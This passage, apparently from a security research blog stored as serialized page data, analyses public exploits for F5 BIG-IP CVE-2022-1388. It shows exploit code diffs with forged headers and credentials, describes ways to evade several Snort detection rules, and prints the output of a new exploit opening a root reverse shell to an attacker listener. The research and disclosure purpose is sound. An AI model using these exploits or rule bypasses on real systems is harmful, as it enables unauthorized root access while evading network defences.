https:\u002F\u002F10.9.49.191\u002F",[1373,102192,183],{"class":1387},[1373,102194,82380],{"class":2209},[1373,102196,4713],{"class":1387},[1373,102198,101592],{"class":1391},[1373,102200,1388],{"class":1387},[1373,102202,82380],{"class":2209},[1373,102204,4713],{"class":1387},[1373,102206,101601],{"class":1391},[1373,102208,1388],{"class":1387},[1373,102210,82380],{"class":2209},[1373,102212,4713],{"class":1387},[1373,102214,101610],{"class":1391},[1373,102216,1388],{"class":1387},[1373,102218,87473],{"class":2209},[1373,102220,4713],{"class":1387},[1373,102222,101619],{"class":1391},[1373,102224,1388],{"class":1387},[1373,102226,101624],{"class":1391},[1373,102228,4912],{"class":1383},[1373,102230,102231,102233,102235,102237],{"class":1375,"line":220},[1373,102232,5384],{"class":1397},[1373,102234,76355],{"class":2206},[1373,102236,100878],{"class":1391},[1373,102238,35589],{"class":1391},[1373,102240,102241,102243],{"class":1375,"line":1266},[1373,102242,5384],{"class":1397},[1373,102244,102245],{"class":4640}," Host: 
localhost\n",[1373,102247,102248,102250],{"class":1375,"line":1852},[1373,102249,5384],{"class":1397},[1373,102251,35603],{"class":4640},[1373,102253,102254,102256,102258,102260,102262],{"class":1375,"line":4692},[1373,102255,5384],{"class":1397},[1373,102257,35610],{"class":4640},[1373,102259,35613],{"class":1397},[1373,102261,2180],{"class":4640},[1373,102263,35618],{"class":1397},[1373,102265,102266,102268],{"class":1375,"line":4724},[1373,102267,5384],{"class":1397},[1373,102269,101668],{"class":4640},[1373,102271,102272,102274],{"class":1375,"line":4756},[1373,102273,5384],{"class":1397},[1373,102275,102276],{"class":4640}," Referer: https:\u002F\u002F10.9.49.191\u002F\n",[1373,102278,102279,102281],{"class":1375,"line":4768},[1373,102280,5384],{"class":1397},[1373,102282,101675],{"class":4640},[1373,102284,102285,102287],{"class":1375,"line":4792},[1373,102286,5384],{"class":1397},[1373,102288,101682],{"class":4640},[1373,102290,102291,102293,102295,102297],{"class":1375,"line":4798},[1373,102292,5384],{"class":1397},[1373,102294,101689],{"class":4640},[1373,102296,5417],{"class":1397},[1373,102298,101694],{"class":1391},[1373,102300,102301,102303],{"class":1375,"line":4806},[1373,102302,5384],{"class":1397},[1373,102304,101701],{"class":4640},[18,102306,2245,102307,102309,102310,102312],{},[886,102308,9024],{}," header shouldn’t impact exploitation, but it’ll allow the attacker to bypass the Emerging Threats Snort 2.9 Rule 2036556. 
The detection was written to ignore any request containing a ",[886,102311,9024],{}," header.",[1354,102314,102316],{"className":100977,"code":102315,"language":100979,"meta":219,"style":219},"content:!\"Referer|3a 20|\"; http_header; \\\n",[886,102317,102318],{"__ignoreMap":219},[1373,102319,102320,102322,102324,102326,102328,102330,102332,102334],{"class":1375,"line":1376},[1373,102321,13389],{"class":4640},[1373,102323,4606],{"class":1383},[1373,102325,16090],{"class":4640},[1373,102327,183],{"class":1387},[1373,102329,101160],{"class":1391},[1373,102331,183],{"class":1387},[1373,102333,101098],{"class":4640},[1373,102335,99089],{"class":1383},[18,102337,102338,102339,102312],{},"Therefore, bypassing the rule is as simple as including an arbitrary ",[886,102340,9024],{},[18,102342,102343],{},"That concludes the variant analysis, and without any original thought whatsoever, we’ve bypassed the first of three Snort rules. But with more than 50 “unique” exploits, how can they all be distilled into four, frankly, very related variations? Let’s take a deeper look at how these exploits are related.",[61,102345,102347],{"id":102346},"comparing-github-exploits-with-ssdeep","Comparing GitHub Exploits with SSDeep",[18,102349,102350,102351,102354,102355,102360],{},"When VulnCheck indexes exploits from GitHub we also store a direct link to the raw exploit code (when possible). For example, the raw link to Horizon3.ai’s exploit code is ",[47,102352,101535],{"href":101535,"rel":102353},[51],". With the raw links readily available, it’s an easy task to apply ",[47,102356,102359],{"href":102357,"rel":102358},"https:\u002F\u002Fssdeep-project.github.io\u002Fssdeep\u002Findex.html",[51],"ssdeep"," to each exploit in order to determine which share code.",[18,102362,102363,102365,102366,102368],{},[886,102364,102359],{},", for those unfamiliar, is a tool that computes a fuzzy hash over a given file. 
A standard hash, like SHA-1 for example, can only tell us if two files are identical. A fuzzy hash can tell us if two files are similar. For example, ",[886,102367,102359],{}," computes the following hashes for these two exploits:",[307,102370,102371,102381],{},[310,102372,102373],{},[313,102374,102375,102378],{},[316,102376,102377],{},"Hash",[316,102379,102380],{},"File",[336,102382,102383,102393],{},[313,102384,102385,102388],{},[341,102386,102387],{},"24:ZCGacygxlWejJ9n3xYt8fHN5mWp1rOVL6L0zwC0syV:ZtJygDVjJ9n3xt\u002FN5LDOVL6LMWV",[341,102389,102390],{},[47,102391,101535],{"href":101535,"rel":102392},[51],[313,102394,102395,102398],{},[341,102396,102397],{},"24:ZCGacygxlWeCfn3xYt8fHN5mWp1rOVL6L0zwC0syv:ZtJygDVCfn3xt\u002FN5LDOVL6LMWv",[341,102399,102400],{},[47,102401,102402],{"href":102402,"rel":102403},"https:\u002F\u002Fraw.githubusercontent.com\u002Fpauloink\u002FCVE-2022-1388\u002Fmain\u002FCVE-2022-1388.py",[51],[18,102405,102406,102407,102409],{},"The computed hashes are (slightly) different, but ",[886,102408,102359],{}," can tell us that they are related (a score above 0 indicates similarity; ssdeep scores range from 0 to 100):",[1354,102411,102413],{"className":11719,"code":102412,"language":11721,"meta":219,"style":219},"Python 3.8.10 (default, Mar 13 2023, 10:26:41)\n[GCC 9.4.0] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import ssdeep\n>>> ssdeep.compare(\"24:ZCGacygxlWejJ9n3xYt8fHN5mWp1rOVL6L0zwC0syV:ZtJygDVjJ9n3xt\u002FN5LDOVL6LMWV\", \"24:ZCGacygxlWeCfn3xYt8fHN5mWp1rOVL6L0zwC0syv:ZtJygDVCfn3xt\u002FN5LDOVL6LMWv\")\n93\n",[886,102414,102415,102456,102475,102520,102531,102561],{"__ignoreMap":219},[1373,102416,102417,102420,102423,102425,102427,102429,102431,102433,102436,102438,102441,102443,102445,102447,102449,102451,102454],{"class":1375,"line":1376},[1373,102418,102419],{"class":4640},"Python 
",[1373,102421,102422],{"class":5467},"3.8",[1373,102424,59],{"class":1383},[1373,102426,24698],{"class":63570},[1373,102428,4641],{"class":1383},[1373,102430,18620],{"class":4640},[1373,102432,5437],{"class":1383},[1373,102434,102435],{"class":4640}," Mar ",[1373,102437,872],{"class":5467},[1373,102439,102440],{"class":5467}," 2023",[1373,102442,5437],{"class":1383},[1373,102444,39673],{"class":5467},[1373,102446,4606],{"class":1383},[1373,102448,745],{"class":5467},[1373,102450,4606],{"class":1383},[1373,102452,102453],{"class":5467},"41",[1373,102455,11875],{"class":1383},[1373,102457,102458,102460,102463,102466,102468,102470,102472],{"class":1375,"line":220},[1373,102459,7035],{"class":1383},[1373,102461,102462],{"class":2326},"GCC",[1373,102464,102465],{"class":5467}," 9.4",[1373,102467,59],{"class":1383},[1373,102469,445],{"class":63570},[1373,102471,15050],{"class":1383},[1373,102473,102474],{"class":4640}," on linux\n",[1373,102476,102477,102480,102482,102484,102486,102488,102490,102493,102495,102497,102499,102502,102504,102506,102508,102511,102513,102515,102518],{"class":1375,"line":1266},[1373,102478,102479],{"class":4640},"Type ",[1373,102481,183],{"class":1387},[1373,102483,39134],{"class":1391},[1373,102485,183],{"class":1387},[1373,102487,5437],{"class":1383},[1373,102489,4883],{"class":1387},[1373,102491,102492],{"class":1391},"copyright",[1373,102494,183],{"class":1387},[1373,102496,5437],{"class":1383},[1373,102498,4883],{"class":1387},[1373,102500,102501],{"class":1391},"credits",[1373,102503,183],{"class":1387},[1373,102505,57252],{"class":1397},[1373,102507,4883],{"class":1387},[1373,102509,102510],{"class":1391},"license",[1373,102512,183],{"class":1387},[1373,102514,55807],{"class":4636},[1373,102516,102517],{"class":4640}," more information",[1373,102519,55527],{"class":1383},[1373,102521,102522,102525,102528],{"class":1375,"line":1852},[1373,102523,102524],{"class":1397},">>>",[1373,102526,102527],{"class":4636}," 
import",[1373,102529,102530],{"class":4640}," ssdeep\n",[1373,102532,102533,102535,102538,102540,102543,102545,102547,102549,102551,102553,102555,102557,102559],{"class":1375,"line":4692},[1373,102534,102524],{"class":1397},[1373,102536,102537],{"class":4640}," ssdeep",[1373,102539,59],{"class":1383},[1373,102541,102542],{"class":11735},"compare",[1373,102544,1384],{"class":1383},[1373,102546,183],{"class":1387},[1373,102548,102387],{"class":1391},[1373,102550,183],{"class":1387},[1373,102552,5437],{"class":1383},[1373,102554,4883],{"class":1387},[1373,102556,102397],{"class":1391},[1373,102558,183],{"class":1387},[1373,102560,11875],{"class":1383},[1373,102562,102563],{"class":1375,"line":4724},[1373,102564,102565],{"class":5467},"93\n",[18,102567,102568],{},"Diffing these exploits, we see that they are very similar indeed.",[1354,102570,102572],{"className":99957,"code":102571,"language":11815,"meta":219,"style":219},"diff -u CVE-2022-1388.py CVE-2022-1388.py.1\n--- CVE-2022-1388.py    2023-04-11 14:45:01.329298751 -0400\n+++ CVE-2022-1388.py.1    2023-04-11 14:45:12.225289447 -0400\n@@ -8,7 +8,7 @@\n  url = f'https:\u002F\u002F{target}\u002Fmgmt\u002Ftm\u002Futil\u002Fbash'\n  headers = {\n      'Host': '127.0.0.1',\n-     'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',\n+     'Authorization': 'Basic YWRtaW46YW55dGhpbmc=',\n      'X-F5-Auth-Token': 'asdf',     \n      'Connection': 'X-F5-Auth-Token',\n      'Content-Type': 'application\u002Fjson'\n@@ -28,6 +28,4 @@\n  parser.add_argument('-c', '--command', help='The command to execute')\n  args = parser.parse_args()\n \n- exploit(args.target, args.command)\n-\n-\n+ exploit(args.target, args.command)\n",[886,102573,102574,102579,102584,102589,102594,102599,102604,102609,102614,102619,102624,102629,102634,102639,102644,102649,102653,102658,102663,102667],{"__ignoreMap":219},[1373,102575,102576],{"class":1375,"line":1376},[1373,102577,102578],{},"diff -u CVE-2022-1388.py 
CVE-2022-1388.py.1\n",[1373,102580,102581],{"class":1375,"line":220},[1373,102582,102583],{},"--- CVE-2022-1388.py    2023-04-11 14:45:01.329298751 -0400\n",[1373,102585,102586],{"class":1375,"line":1266},[1373,102587,102588],{},"+++ CVE-2022-1388.py.1    2023-04-11 14:45:12.225289447 -0400\n",[1373,102590,102591],{"class":1375,"line":1852},[1373,102592,102593],{},"@@ -8,7 +8,7 @@\n",[1373,102595,102596],{"class":1375,"line":4692},[1373,102597,102598],{},"  url = f'https:\u002F\u002F{target}\u002Fmgmt\u002Ftm\u002Futil\u002Fbash'\n",[1373,102600,102601],{"class":1375,"line":4724},[1373,102602,102603],{},"  headers = {\n",[1373,102605,102606],{"class":1375,"line":4756},[1373,102607,102608],{},"      'Host': '127.0.0.1',\n",[1373,102610,102611],{"class":1375,"line":4768},[1373,102612,102613],{},"-     'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',\n",[1373,102615,102616],{"class":1375,"line":4792},[1373,102617,102618],{},"+     'Authorization': 'Basic YWRtaW46YW55dGhpbmc=',\n",[1373,102620,102621],{"class":1375,"line":4798},[1373,102622,102623],{},"      'X-F5-Auth-Token': 'asdf',     \n",[1373,102625,102626],{"class":1375,"line":4806},[1373,102627,102628],{},"      'Connection': 'X-F5-Auth-Token',\n",[1373,102630,102631],{"class":1375,"line":4817},[1373,102632,102633],{},"      'Content-Type': 'application\u002Fjson'\n",[1373,102635,102636],{"class":1375,"line":4825},[1373,102637,102638],{},"@@ -28,6 +28,4 @@\n",[1373,102640,102641],{"class":1375,"line":4835},[1373,102642,102643],{},"  parser.add_argument('-c', '--command', help='The command to execute')\n",[1373,102645,102646],{"class":1375,"line":4843},[1373,102647,102648],{},"  args = parser.parse_args()\n",[1373,102650,102651],{"class":1375,"line":4849},[1373,102652,19298],{},[1373,102654,102655],{"class":1375,"line":4877},[1373,102656,102657],{},"- exploit(args.target, 
args.command)\n",[1373,102659,102660],{"class":1375,"line":4915},[1373,102661,102662],{},"-\n",[1373,102664,102665],{"class":1375,"line":4931},[1373,102666,102662],{},[1373,102668,102669],{"class":1375,"line":4947},[1373,102670,102671],{},"+ exploit(args.target, args.command)\n",[18,102673,102674],{},"The difference between these two “unique” exploits is a slight change in whitespace and a change of the admin user’s password from “horizon3” to “anything.” We found a lot of this sort of thing when we analyzed the 50+ GitHub exploits. For example, consider this screenshot that shows five exploits side-by-side.",[18,102676,102677],{},[68,102678],{":width":10862,"alt":102679,"src":102680},"Related Exploits","\u002Fblog\u002Fnew-cve-2022-1388\u002Frelated-exploits.png",[18,102682,102683,102684,102686,102687,102689,102690,102692],{},"Outside of their comments and output formatting, these exploits are nearly identical (two of these are “Kind of Works” variants because they removed the ",[886,102685,6301],{}," header). A normal hash wouldn’t have been able to identify whether these exploits were related, but ",[886,102688,102359],{}," was able to lump them into two groups. Then we were able to connect them afterward (",[886,102691,102359],{}," is not necessarily optimal for these small file sizes). 
Their hashes follow:",[307,102694,102695,102703],{},[310,102696,102697],{},[313,102698,102699,102701],{},[316,102700,102377],{},[316,102702,102380],{},[336,102704,102705,102716,102727,102738,102749],{},[313,102706,102707,102710],{},[341,102708,102709],{},"48:rArpnVOEUlQY0YIQUG+Clu8T26HlCO1dg6LQ3HnczPPuoHzPppkqEpvAZgcU2aAD:sFnkDQY5RhQXUfpKqCQgcU1YVbfp",[341,102711,102712],{},[47,102713,102714],{"href":102714,"rel":102715},"https:\u002F\u002Fraw.githubusercontent.com\u002FZephrFish\u002FF5-CVE-2022-1388-Exploit\u002Fmain\u002FCVE_2022_1388.py",[51],[313,102717,102718,102721],{},[341,102719,102720],{},"48:krpnVOEUlQY0YIQUGwhGgfT26HlCO1dg6LQ3HnczPPuoHzPppkqEpvAZgcU2aALn:kFnkDQYQRhQXUfpKqCQgcU1YVbfp",[341,102722,102723],{},[47,102724,102725],{"href":102725,"rel":102726},"https:\u002F\u002Fraw.githubusercontent.com\u002Fdevengpk\u002FCVE-2022-1388\u002Fmain\u002Fexploit.py",[51],[313,102728,102729,102732],{},[341,102730,102731],{},"48:9rpnVO8VCO1dg6LQtnczPPujHzPppkqEpvApgcU2sALslAeKUtxQj4OsZkKClfas:9Fnk2hQtU4pKqCmgcUtMVbfNR",[341,102733,102734],{},[47,102735,102736],{"href":102736,"rel":102737},"https:\u002F\u002Fraw.githubusercontent.com\u002Fthatonesecguy\u002FCVE-2022-1388-Exploit\u002Fmain\u002FCVE_2022_1388.py",[51],[313,102739,102740,102743],{},[341,102741,102742],{},"96:UjbFnk+QY09edQXUwzpdVPAMwxSV5gcU12VLizsp:UjbOY08dQXXd9AMOiw2VLizsp",[341,102744,102745],{},[47,102746,102747],{"href":102747,"rel":102748},"https:\u002F\u002Fraw.githubusercontent.com\u002Fbytecaps\u002FCVE-2022-1388-EXP\u002Fmain\u002Fexp.py",[51],[313,102750,102751,102754],{},[341,102752,102753],{},"96:8Fnk+QY03epQ\u002FJXNSYdpdVYf\u002FMhdgcU1\u002FVLJlp:8OY0OpQ\u002FJXNSQdSnMhs\u002FVLJlp",[341,102755,102756],{},[47,102757,102758],{"href":102758,"rel":102759},"https:\u002F\u002Fraw.githubusercontent.com\u002FLinJacck\u002FCVE-2022-1388-EXP\u002Fmain\u002FCVE-2022-1388.py",[51],[18,102761,102762],{},"The reality is that there are only four exploit variants of CVE-2022-1388 on GitHub because many 
of the exploits are mostly copy-and-paste jobs. Unfortunately for us, that means we need to look elsewhere to discover an interesting or new nugget of information. Let’s cast about for the next thing.",[61,102764,102766],{"id":102765},"hunting-on-attackerkb","Hunting on AttackerKB",[18,102768,102769,102770,102775,102776,102780,102781,31686],{},"As a former ",[47,102771,102774],{"href":102772,"rel":102773},"https:\u002F\u002Fattackerkb.com\u002F",[51],"AttackerKB"," contributor, this author is biased. I firmly believe Rapid7’s Technical Analyses on AttackerKB are underappreciated. They are a great place to monitor for new exploits. The VulnCheck exploit repository indicates the AttackerKB entry for ",[47,102777,92074],{"href":102778,"rel":102779},"https:\u002F\u002Fattackerkb.com\u002Ftopics\u002FSN5WCzYO7W\u002Fcve-2022-1388\u002Frapid7-analysis",[51]," has exploits. After reading the AttackerKB analysis, we found this important note (likely attributable to ",[47,102782,102785],{"href":102783,"rel":102784},"https:\u002F\u002Fgithub.com\u002Frbowes-r7",[51],"Ron Bowes",[1925,102787,102788],{},[18,102789,102790],{},"While testing, before we knew about \u002Fmgmt\u002Ftm\u002Futil\u002Fbash, we actually devised a much more complicated way to run code: RPM specification injection! We’ll show that method here, because it’s conceivable that an attacker might use it to evade detection. 
It’s also kinda interesting!",[18,102792,102793],{},"The write-up goes on to describe how to use two HTTP endpoints to execute arbitrary commands on the F5 BIG-IP HTTP management interface:",[1789,102795,102796,102802],{},[25,102797,102798,102801],{},[886,102799,102800],{},"\u002Fmgmt\u002Fshared\u002Fiapp\u002Frpm-spec-creator"," to provide the command(s) to execute",[25,102803,102804,102807],{},[886,102805,102806],{},"\u002Fmgmt\u002Fshared\u002Fiapp\u002Fbuild-package"," to trigger execution.",[18,102809,102810,102811,102816,102817,102822],{},"However, the analysis doesn’t provide a proof of concept exploit that uses the endpoint in conjunction with CVE-2022-1388. Additionally, ",[47,102812,102815],{"href":102813,"rel":102814},"https:\u002F\u002Fgithub.com\u002Fsearch?q=%2Fmgmt%2Fshared%2Fiapp%2Frpm-spec-creator&type=code",[51],"searching GitHub"," for these endpoints doesn’t yield any results for CVE-2022-1388 (Rapid7 later got this issue fixed as ",[47,102818,102821],{"href":102819,"rel":102820},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2022\u002F11\u002F16\u002Fcve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures\u002F",[51],"CVE-2022-41800"," and published their disclosure in November 2022 - the results on GitHub all point to the associated Metasploit module for CVE-2022-41800).",[18,102824,102825,102826,102828],{},"Essentially, the AttackerKB analysis told everyone a CVE-2022-1388 exploit variation was possible. But then no one actually published an exploit demonstrating that. We can remedy that, and we are especially excited to do so because this variant will bypass a second Snort rule! 
Snort 2.9 Community Rule 57336 explicitly looks for the ",[886,102827,2197],{}," endpoint:",[1354,102830,102832],{"className":100977,"code":102831,"language":100979,"meta":219,"style":219},"content:\"\u002Fmgmt\u002Ftm\u002Futil\u002Fbash\"; fast_pattern:only; http_uri;\n",[886,102833,102834],{"__ignoreMap":219},[1373,102835,102836,102838,102840,102842,102844,102846,102848,102850,102853],{"class":1375,"line":1376},[1373,102837,13389],{"class":4640},[1373,102839,4606],{"class":1383},[1373,102841,183],{"class":1387},[1373,102843,100862],{"class":1391},[1373,102845,183],{"class":1387},[1373,102847,101290],{"class":4640},[1373,102849,4606],{"class":1383},[1373,102851,102852],{"class":4640},"only; http_uri",[1373,102854,4912],{"class":28571},[18,102856,102857,102858,4606],{},"Similarly, Emerging Threats Snort 2.9 Rule 2036556 is bypassed because it only looks for ",[886,102859,102860],{},"\u002Fmgmt\u002Ftm\u002F",[1354,102862,102864],{"className":100977,"code":102863,"language":100979,"meta":219,"style":219},"content:\"\u002Fmgmt\u002Ftm\"; http_uri; depth:8;\n",[886,102865,102866],{"__ignoreMap":219},[1373,102867,102868,102870,102872,102874,102876,102878,102880,102882,102884],{"class":1375,"line":1376},[1373,102869,13389],{"class":4640},[1373,102871,4606],{"class":1383},[1373,102873,183],{"class":1387},[1373,102875,101069],{"class":1391},[1373,102877,183],{"class":1387},[1373,102879,101074],{"class":4640},[1373,102881,4606],{"class":1383},[1373,102883,37681],{"class":5467},[1373,102885,4912],{"class":28571},[18,102887,102888,102889,102893,102894,102897],{},"Here we are again: with next to no original thought, we’ve found a second rule bypass and we’re able to contribute a new exploit variant to the GitHub exploit ecosystem. You can find our new exploit ",[47,102890,305],{"href":102891,"rel":102892},"https:\u002F\u002Fgithub.com\u002Fj-baines\u002Ftippa-my-tongue",[51],". 
The exploit implements two signature bypasses and opts for the ",[886,102895,102896],{},"X-Forward-Host"," variation. Example output:",[1354,102899,102901],{"className":92494,"code":102900,"language":28578,"meta":219,"style":219},"albinolobster@mournland:~\u002Ftippa-my-tongue$ python3 tippa-my-tongue.py --rhost 10.9.49.191 --lhost 10.9.49.194\n\n   ▄▄▄▄▄▪   ▄▄▄· ▄▄▄· ▄▄▄·     • ▌ ▄ ·.  ▄· ▄\n   •██  ██ ▐█ ▄█▐█ ▄█▐█ ▀█     ·██ ▐███▪▐█▪██\n    ▐█.▪▐█· ██▀· ██▀·▄█▀▀█     ▐█ ▌▐▌▐█·▐█▌▐█▪\n    ▐█▌·▐█▌▐█▪·•▐█▪·•▐█ ▪▐▌    ██ ██▌▐█▌ ▐█▀·.\n    ▀▀▀ ▀▀▀.▀   .▀    ▀  ▀     ▀▀  █▪▀▀▀  ▀ • \n         ▄▄▄▄▄       ▐ ▄  ▄▄ • ▄• ▄▌▄▄▄ .     \n         •██  ▪     •█▌▐█▐█ ▀ ▪█▪██▌▀▄.▀·     \n          ▐█.▪ ▄█▀▄ ▐█▐▐▌▄█ ▀█▄█▌▐█▌▐▀▀▪▄     \n          ▐█▌·▐█▌.▐▌██▐█▌▐█▄▪▐█▐█▄█▌▐█▄▄▌     \n          ▀▀▀  ▀█▄▀▪▀▀ █▪·▀▀▀▀  ▀▀▀  ▀▀▀      \n\n                 CVE-2022-1388                \n                 CVE-2022-41800               \n\n                       🦞                     \n\n[+] Executing netcat listener\n[+] Using \u002Fusr\u002Fbin\u002Fnc\nListening on 0.0.0.0 1270\n[+] Sending initial request to rpm-spec-creator\n[+] Sending exploit attempt request to build-package\nConnection received on 10.9.49.191 47152\nbash: no job control in this shell\n[@localhost:NO LICENSE:Standalone] BUILD # pwd\npwd\n\u002Fvar\u002Fconfig\u002Frest\u002Fnode\u002Ftmp\u002FBUILD\n[@localhost:NO LICENSE:Standalone] BUILD # id\nid\nuid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n[@localhost:NO LICENSE:Standalone] BUILD #\n",[886,102902,102903,102908,102912,102917,102922,102927,102932,102937,102942,102947,102952,102957,102962,102966,102971,102976,102980,102985,102989,102994,102999,103003,103008,103013,103018,103023,103028,103032,103037,103042,103046,103051],{"__ignoreMap":219},[1373,102904,102905],{"class":1375,"line":1376},[1373,102906,102907],{},"albinolobster@mournland:~\u002Ftippa-my-tongue$ python3 tippa-my-tongue.py --rhost 10.9.49.191 --lhost 
10.9.49.194\n",[1373,102909,102910],{"class":1375,"line":220},[1373,102911,6520],{"emptyLinePlaceholder":237},[1373,102913,102914],{"class":1375,"line":1266},[1373,102915,102916],{},"   ▄▄▄▄▄▪   ▄▄▄· ▄▄▄· ▄▄▄·     • ▌ ▄ ·.  ▄· ▄\n",[1373,102918,102919],{"class":1375,"line":1852},[1373,102920,102921],{},"   •██  ██ ▐█ ▄█▐█ ▄█▐█ ▀█     ·██ ▐███▪▐█▪██\n",[1373,102923,102924],{"class":1375,"line":4692},[1373,102925,102926],{},"    ▐█.▪▐█· ██▀· ██▀·▄█▀▀█     ▐█ ▌▐▌▐█·▐█▌▐█▪\n",[1373,102928,102929],{"class":1375,"line":4724},[1373,102930,102931],{},"    ▐█▌·▐█▌▐█▪·•▐█▪·•▐█ ▪▐▌    ██ ██▌▐█▌ ▐█▀·.\n",[1373,102933,102934],{"class":1375,"line":4756},[1373,102935,102936],{},"    ▀▀▀ ▀▀▀.▀   .▀    ▀  ▀     ▀▀  █▪▀▀▀  ▀ • \n",[1373,102938,102939],{"class":1375,"line":4768},[1373,102940,102941],{},"         ▄▄▄▄▄       ▐ ▄  ▄▄ • ▄• ▄▌▄▄▄ .     \n",[1373,102943,102944],{"class":1375,"line":4792},[1373,102945,102946],{},"         •██  ▪     •█▌▐█▐█ ▀ ▪█▪██▌▀▄.▀·     \n",[1373,102948,102949],{"class":1375,"line":4798},[1373,102950,102951],{},"          ▐█.▪ ▄█▀▄ ▐█▐▐▌▄█ ▀█▄█▌▐█▌▐▀▀▪▄     \n",[1373,102953,102954],{"class":1375,"line":4806},[1373,102955,102956],{},"          ▐█▌·▐█▌.▐▌██▐█▌▐█▄▪▐█▐█▄█▌▐█▄▄▌     \n",[1373,102958,102959],{"class":1375,"line":4817},[1373,102960,102961],{},"          ▀▀▀  ▀█▄▀▪▀▀ █▪·▀▀▀▀  ▀▀▀  ▀▀▀      \n",[1373,102963,102964],{"class":1375,"line":4825},[1373,102965,6520],{"emptyLinePlaceholder":237},[1373,102967,102968],{"class":1375,"line":4835},[1373,102969,102970],{},"                 CVE-2022-1388                \n",[1373,102972,102973],{"class":1375,"line":4843},[1373,102974,102975],{},"                 CVE-2022-41800               \n",[1373,102977,102978],{"class":1375,"line":4849},[1373,102979,6520],{"emptyLinePlaceholder":237},[1373,102981,102982],{"class":1375,"line":4877},[1373,102983,102984],{},"                       🦞                     
\n",[1373,102986,102987],{"class":1375,"line":4915},[1373,102988,6520],{"emptyLinePlaceholder":237},[1373,102990,102991],{"class":1375,"line":4931},[1373,102992,102993],{},"[+] Executing netcat listener\n",[1373,102995,102996],{"class":1375,"line":4947},[1373,102997,102998],{},"[+] Using \u002Fusr\u002Fbin\u002Fnc\n",[1373,103000,103001],{"class":1375,"line":4952},[1373,103002,35384],{},[1373,103004,103005],{"class":1375,"line":6776},[1373,103006,103007],{},"[+] Sending initial request to rpm-spec-creator\n",[1373,103009,103010],{"class":1375,"line":6781},[1373,103011,103012],{},"[+] Sending exploit attempt request to build-package\n",[1373,103014,103015],{"class":1375,"line":7524},[1373,103016,103017],{},"Connection received on 10.9.49.191 47152\n",[1373,103019,103020],{"class":1375,"line":7530},[1373,103021,103022],{},"bash: no job control in this shell\n",[1373,103024,103025],{"class":1375,"line":7546},[1373,103026,103027],{},"[@localhost:NO LICENSE:Standalone] BUILD # pwd\n",[1373,103029,103030],{"class":1375,"line":7571},[1373,103031,98638],{},[1373,103033,103034],{"class":1375,"line":7598},[1373,103035,103036],{},"\u002Fvar\u002Fconfig\u002Frest\u002Fnode\u002Ftmp\u002FBUILD\n",[1373,103038,103039],{"class":1375,"line":7615},[1373,103040,103041],{},"[@localhost:NO LICENSE:Standalone] BUILD # id\n",[1373,103043,103044],{"class":1375,"line":7635},[1373,103045,9460],{},[1373,103047,103048],{"class":1375,"line":7640},[1373,103049,103050],{},"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n",[1373,103052,103053],{"class":1375,"line":7648},[1373,103054,103055],{},"[@localhost:NO LICENSE:Standalone] BUILD #\n",[61,103057,103059],{"id":103058},"out-of-luck","Out of Luck",[18,103061,103062],{},"We’ve gathered variant ideas from GitHub. We’ve pilfered a new exploit endpoint from a better researcher. We’ve written a new exploit and bypassed two Snort rules, but there is still one more Snort rule we haven’t bypassed. 
Snort 2.9 Community Rule 59735:",[1354,103064,103065],{"className":100977,"code":101344,"language":100979,"meta":219,"style":219},[886,103066,103067,103103,103117,103133,103155,103173],{"__ignoreMap":219},[1373,103068,103069,103071,103073,103075,103077,103079,103081,103083,103085,103087,103089,103091,103093,103095,103097,103099,103101],{"class":1375,"line":1376},[1373,103070,100986],{"class":4640},[1373,103072,4644],{"class":28571},[1373,103074,101232],{"class":2326},[1373,103076,99071],{"class":1379},[1373,103078,100993],{"class":28571},[1373,103080,4656],{"class":28571},[1373,103082,100998],{"class":2326},[1373,103084,4656],{"class":28571},[1373,103086,101003],{"class":11735},[1373,103088,1384],{"class":1383},[1373,103090,101008],{"class":11735},[1373,103092,4606],{"class":1383},[1373,103094,183],{"class":1387},[1373,103096,101377],{"class":1391},[1373,103098,183],{"class":1387},[1373,103100,101020],{"class":11735},[1373,103102,99089],{"class":1383},[1373,103104,103105,103107,103109,103111,103113,103115],{"class":1375,"line":220},[1373,103106,101027],{"class":11735},[1373,103108,4606],{"class":1383},[1373,103110,101270],{"class":11735},[1373,103112,5437],{"class":1383},[1373,103114,101396],{"class":11735},[1373,103116,99089],{"class":1383},[1373,103118,103119,103121,103123,103125,103127,103129,103131],{"class":1375,"line":1266},[1373,103120,51846],{"class":11735},[1373,103122,4606],{"class":1383},[1373,103124,183],{"class":1387},[1373,103126,100918],{"class":1391},[1373,103128,183],{"class":1387},[1373,103130,101413],{"class":11735},[1373,103132,99089],{"class":1383},[1373,103134,103135,103137,103139,103141,103143,103145,103147,103149,103151,103153],{"class":1375,"line":1852},[1373,103136,51846],{"class":11735},[1373,103138,4606],{"class":1383},[1373,103140,183],{"class":1387},[1373,103142,101426],{"class":1391},[1373,103144,183],{"class":1387},[1373,103146,101431],{"class":11735},[1373,103148,4606],{"class":1383},[1373,103150,445],{"class":5467},[1373,103152,1014
38],{"class":11735},[1373,103154,99089],{"class":1383},[1373,103156,103157,103159,103161,103163,103165,103167,103169,103171],{"class":1375,"line":4692},[1373,103158,101123],{"class":11735},[1373,103160,4606],{"class":1383},[1373,103162,183],{"class":1387},[1373,103164,101451],{"class":1391},[1373,103166,15491],{"class":2326},[1373,103168,101456],{"class":1391},[1373,103170,183],{"class":1387},[1373,103172,4912],{"class":11735},[1373,103174,103175,103177,103179,103181,103183,103185,103187,103189,103191,103193,103195,103197,103199,103201,103203,103205,103207,103209,103211],{"class":1375,"line":4724},[1373,103176,101465],{"class":11735},[1373,103178,4606],{"class":1383},[1373,103180,242],{"class":11735},[1373,103182,5437],{"class":1383},[1373,103184,100820],{"class":5467},[1373,103186,61062],{"class":1397},[1373,103188,101478],{"class":5467},[1373,103190,101481],{"class":11735},[1373,103192,4606],{"class":1383},[1373,103194,101486],{"class":11735},[1373,103196,61062],{"class":1397},[1373,103198,101491],{"class":11735},[1373,103200,4606],{"class":1383},[1373,103202,101496],{"class":5467},[1373,103204,101207],{"class":11735},[1373,103206,4606],{"class":1383},[1373,103208,353],{"class":5467},[1373,103210,39663],{"class":11735},[1373,103212,11875],{"class":1383},[18,103214,103215,103216,103218,103219,103222],{}